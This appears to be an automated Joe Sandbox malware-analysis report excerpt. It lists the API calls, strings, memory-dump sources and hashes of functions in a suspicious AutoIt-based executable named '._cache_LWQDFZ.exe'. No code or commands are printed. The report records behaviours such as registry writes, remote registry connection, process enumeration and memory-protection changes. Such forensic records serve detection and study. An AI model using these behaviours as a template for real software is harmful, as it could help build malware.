                                                                                                                      • Instruction ID: ef9ef29b949d9ddb0a57f022e28ff7e068ad2c0df7936ed20f2530d1f2e3eaba
                                                                                                                      • Opcode Fuzzy Hash: 3fdeba90fc071f7d9bddcbb9f919d8714024f13dacd011b4d56e70aef24ae10b
                                                                                                                      • Instruction Fuzzy Hash: 91E17D75604200AFCB15DF25C995D2BBBE8EF89314F04896EF84ADB2A1DB34ED01CB56

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 003A2A33
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 003A2A5D
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003A2A80
                                                                                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 003A2A8B
                                                                                                                      • CreatePopupMenu.USER32 ref: 003A2A9F
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 003A2AAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                      • String ID: TaskbarCreated
                                                                                                                      • API String ID: 157504867-2362178303
                                                                                                                      • Opcode ID: 548f32600f7387e18830efaf0ccc1d2ef89f41c9e93c3eb648f13d68877e1b93
                                                                                                                      • Instruction ID: 3da54a9451d0df7718e0259e679cd0e17611662b28b84eb4324061c5894f6991
                                                                                                                      • Opcode Fuzzy Hash: 548f32600f7387e18830efaf0ccc1d2ef89f41c9e93c3eb648f13d68877e1b93
                                                                                                                      • Instruction Fuzzy Hash: 5E415B31204645AFDB3B6F6C9D09BBB365AE717340F084126F902D69B1EFB48C90836E
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 003BE4A7
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,0043DC28,?,?), ref: 003BE567
                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,0043DC28,?,?), ref: 003BE5BC
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 003BE5C7
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 003BE5DA
                                                                                                                      • GetSystemInfo.KERNEL32(?,0043DC28,?,?), ref: 003BE5E4
                                                                                                                      • GetSystemInfo.KERNEL32(?,0043DC28,?,?), ref: 003BE5F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2717633055-0
                                                                                                                      • Opcode ID: 6dae317344067318d983cc6e748d5ca9dca423f92a2905786df3389063543b83
                                                                                                                      • Instruction ID: b0be1b4f60099e9ab846a00d1d8f44304db743d39fba20539a88f4320dade003
                                                                                                                      • Opcode Fuzzy Hash: 6dae317344067318d983cc6e748d5ca9dca423f92a2905786df3389063543b83
                                                                                                                      • Instruction Fuzzy Hash: F661E3B1909284CFCF26CF6C98C11EA7FB46F6A308F1945DAD8449F70BD624C949CB69
                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003A3202
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 003A3219
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004157D7
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004157EC
                                                                                                                      • LockResource.KERNEL32(?), ref: 004157FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT
                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003E6F7D
                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003E6F8D
                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 003E6FAC
                                                                                                                      • __wsplitpath.LIBCMT ref: 003E6FD0
                                                                                                                      • _wcscat.LIBCMT ref: 003E6FE3
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003E7022
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1605983538-0
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 005021EA
                                                                                                                      • GetProcAddress.KERNEL32(?,004FBFF9), ref: 00502208
                                                                                                                      • ExitProcess.KERNEL32(?,004FBFF9), ref: 00502219
                                                                                                                      • VirtualProtect.KERNEL32(003A0000,00001000,00000004,?,00000000), ref: 00502267
                                                                                                                      • VirtualProtect.KERNEL32(003A0000,00001000), ref: 0050227C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996367037-0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 003E78CB
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003EF04D
                                                                                                                      • CoCreateInstance.COMBASE(0042DA7C,00000000,00000001,0042D8EC,?), ref: 003EF066
                                                                                                                      • CoUninitialize.COMBASE ref: 003EF083
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: G-:
                                                                                                                      • API String ID: 0-1823654154
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNEL32(003AC848,003AC848), ref: 003BDDA2
                                                                                                                      • FindFirstFileW.KERNEL32(003AC848,?), ref: 00414A83
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesFindFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4185537391-0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3964851224-0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: NameUser
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2645101109-0
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE279
                                                                                                                      • timeGetTime.WINMM ref: 003AE51A
                                                                                                                      • TranslateMessage.USER32(?), ref: 003AE646
                                                                                                                      • DispatchMessageW.USER32(?), ref: 003AE651
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003AE664
                                                                                                                      • LockWindowUpdate.USER32(00000000), ref: 003AE697
                                                                                                                      • DestroyWindow.USER32 ref: 003AE6A3
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003AE6BD
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00415B15
                                                                                                                      • TranslateMessage.USER32(?), ref: 004162AF
                                                                                                                      • DispatchMessageW.USER32(?), ref: 004162BD
                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004162D1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                      • API String ID: 2641332412-570651680
                                                                                                                      • Opcode ID: 6257f9e2a1737929b7bb4b618cbaf5406759bbd90d990a3aae93aa573193e02e
                                                                                                                      • Instruction ID: d7a5f54a1a3117fc804e11c8339982e24ffd7e322ba7c92a3c106f23f903c679
                                                                                                                      • Opcode Fuzzy Hash: 6257f9e2a1737929b7bb4b618cbaf5406759bbd90d990a3aae93aa573193e02e
                                                                                                                      • Instruction Fuzzy Hash: 8762C170604340DFDB26DF64C895BAA77E8EF46304F08497EE9468B2A2D7B4D884CB56
                                                                                                                      APIs
                                                                                                                      • ___createFile.LIBCMT ref: 003D6C73
                                                                                                                      • ___createFile.LIBCMT ref: 003D6CB4
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003D6CDD
                                                                                                                      • __dosmaperr.LIBCMT ref: 003D6CE4
                                                                                                                      • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003D6CF7
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 003D6D1A
                                                                                                                      • __dosmaperr.LIBCMT ref: 003D6D23
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003D6D2C
                                                                                                                      • __set_osfhnd.LIBCMT ref: 003D6D5C
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6DC6
                                                                                                                      • __close_nolock.LIBCMT ref: 003D6DEC
                                                                                                                      • __chsize_nolock.LIBCMT ref: 003D6E1C
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6E2E
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6F26
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6F3B
                                                                                                                      • __close_nolock.LIBCMT ref: 003D6F9B
                                                                                                                        • Part of subcall function 003CF84C: CloseHandle.KERNEL32(00000000,0044EEC4,00000000,?,003D6DF1,0044EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003CF89C
                                                                                                                        • Part of subcall function 003CF84C: GetLastError.KERNEL32(?,003D6DF1,0044EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003CF8A6
                                                                                                                        • Part of subcall function 003CF84C: __free_osfhnd.LIBCMT ref: 003CF8B3
                                                                                                                        • Part of subcall function 003CF84C: __dosmaperr.LIBCMT ref: 003CF8D5
                                                                                                                        • Part of subcall function 003C889E: __getptd_noexit.LIBCMT ref: 003C889E
                                                                                                                      • __lseeki64_nolock.LIBCMT ref: 003D6FBD
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 003D70F2
                                                                                                                      • ___createFile.LIBCMT ref: 003D7111
                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 003D711E
                                                                                                                      • __dosmaperr.LIBCMT ref: 003D7125
                                                                                                                      • __free_osfhnd.LIBCMT ref: 003D7145
                                                                                                                      • __invoke_watson.LIBCMT ref: 003D7173
                                                                                                                      • __wsopen_helper.LIBCMT ref: 003D718D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                      • String ID: 9A<$@
                                                                                                                      • API String ID: 3896587723-3825118832
                                                                                                                      • Opcode ID: fb1eafeb12e901aecfed9e20b7c230bd69a369ce412db87c2a29dcbc9ba33516
                                                                                                                      • Instruction ID: 08e148efc4d813765c6224c0f7cbab24a7bc4e27f7db8e850190823910f2ef4b
                                                                                                                      • Opcode Fuzzy Hash: fb1eafeb12e901aecfed9e20b7c230bd69a369ce412db87c2a29dcbc9ba33516
                                                                                                                      • Instruction Fuzzy Hash: AE2201739042059BEB279F68FC52BAE7B65EB04320F25422BE961EB3D2D7358D40CB51

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 003E76ED
                                                                                                                      • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 003E7713
                                                                                                                      • _wcscpy.LIBCMT ref: 003E7741
                                                                                                                      • _wcscmp.LIBCMT ref: 003E774C
                                                                                                                      • _wcscat.LIBCMT ref: 003E7762
                                                                                                                      • _wcsstr.LIBCMT ref: 003E776D
                                                                                                                      • 75381560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003E7789
                                                                                                                      • _wcscat.LIBCMT ref: 003E77D2
                                                                                                                      • _wcscat.LIBCMT ref: 003E77D9
                                                                                                                      • _wcsncpy.LIBCMT ref: 003E7804
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$FileInfoVersion$75381560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                      • API String ID: 2589663703-1459072770
                                                                                                                      • Opcode ID: 69a1139731dba61ef60e764435f8a66bfef0c64cc07f5bd17dda1bcea136167d
                                                                                                                      • Instruction ID: 72fd9a9f5d03627feedf4fdc36d1f70c0a513c8571a2f112d094a82d93c70a62
                                                                                                                      • Opcode Fuzzy Hash: 69a1139731dba61ef60e764435f8a66bfef0c64cc07f5bd17dda1bcea136167d
                                                                                                                      • Instruction Fuzzy Hash: 8441F571A04210BAEB02AB659C47FBF77ACEF59710F14016AF801EA183EB749E01D7A5

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • GetForegroundWindow.USER32 ref: 003A1FBE
                                                                                                                      • IsWindow.USER32(?), ref: 0041282E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Foreground_memmove
                                                                                                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                      • API String ID: 3828923867-1919597938
                                                                                                                      • Opcode ID: a3b7860cd874cec67aa73d6cd4cb80bbb6661f206869787bdee6ccd8fa836665
                                                                                                                      • Instruction ID: e1d5f5d32fd76c00ebb1ca5327307eecb7ea798432f8c12d85f34c09f3e4adea
                                                                                                                      • Opcode Fuzzy Hash: a3b7860cd874cec67aa73d6cd4cb80bbb6661f206869787bdee6ccd8fa836665
                                                                                                                      • Instruction Fuzzy Hash: AAD11A30504202DFCB09EF14C980ADAB7A1FF55344F044A2FF455DB6A2DB74E9AACB96

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00403626
                                                                                                                      • RegCreateKeyExW.KERNEL32(?,?,00000000,0043DBF0,00000000,?,00000000,?,?), ref: 00403694
                                                                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004036DC
                                                                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00403765
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00403A85
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00403A92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                      • API String ID: 536824911-966354055
                                                                                                                      • Opcode ID: b04ee44c2fe8bd74295ec735884cc7d9d515e060292d23d57b96262e79e85d01
                                                                                                                      • Instruction ID: ca29b3ea0b625d9393b47d25efc29a5114a276eaf07d30b7cee085dd4d0195d7
                                                                                                                      • Opcode Fuzzy Hash: b04ee44c2fe8bd74295ec735884cc7d9d515e060292d23d57b96262e79e85d01
                                                                                                                      • Instruction Fuzzy Hash: D6027E756006019FCB15EF15C891E2AB7E8FF89724F04856EF88AAB3A1DB34ED01CB45

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 003BEA39
                                                                                                                      • __wsplitpath.LIBCMT ref: 003BEA56
                                                                                                                        • Part of subcall function 003C297D: __wsplitpath_helper.LIBCMT ref: 003C29BD
                                                                                                                      • _wcsncat.LIBCMT ref: 003BEA69
                                                                                                                      • __makepath.LIBCMT ref: 003BEA85
                                                                                                                        • Part of subcall function 003C2BFF: __wmakepath_s.LIBCMT ref: 003C2C13
                                                                                                                        • Part of subcall function 003C010A: std::exception::exception.LIBCMT ref: 003C013E
                                                                                                                        • Part of subcall function 003C010A: __CxxThrowException@8.LIBCMT ref: 003C0153
                                                                                                                      • _wcscpy.LIBCMT ref: 003BEABE
                                                                                                                        • Part of subcall function 003BEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,003BEADA,?,?), ref: 003BEB27
                                                                                                                      • _wcscat.LIBCMT ref: 004132FC
                                                                                                                      • _wcscat.LIBCMT ref: 00413334
                                                                                                                      • _wcsncpy.LIBCMT ref: 00413370
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                                                                                                      • String ID: '/>$Include$\$"F
                                                                                                                      • API String ID: 1213536620-2635766330
                                                                                                                      • Opcode ID: b1f7218ec47a9b55e46f8e8a33d80126404f5e5d2be83d84625e79987a683f5b
                                                                                                                      • Instruction ID: de9a1526af91306fcc078ccb827c0075949252600ad8ad923a6c9c61a113a2a6
                                                                                                                      • Opcode Fuzzy Hash: b1f7218ec47a9b55e46f8e8a33d80126404f5e5d2be83d84625e79987a683f5b
                                                                                                                      • Instruction Fuzzy Hash: 0E518FB2404740ABC315EF65EE95C9BB7E8FB49300B40452EF945C7261EBF49A84CB6B

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00000000,00000001,00000000), ref: 003A428C
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 003C1BC7: __wcsicmp_l.LIBCMT ref: 003C1C50
                                                                                                                      • _wcscpy.LIBCMT ref: 003A43C0
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0041214E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
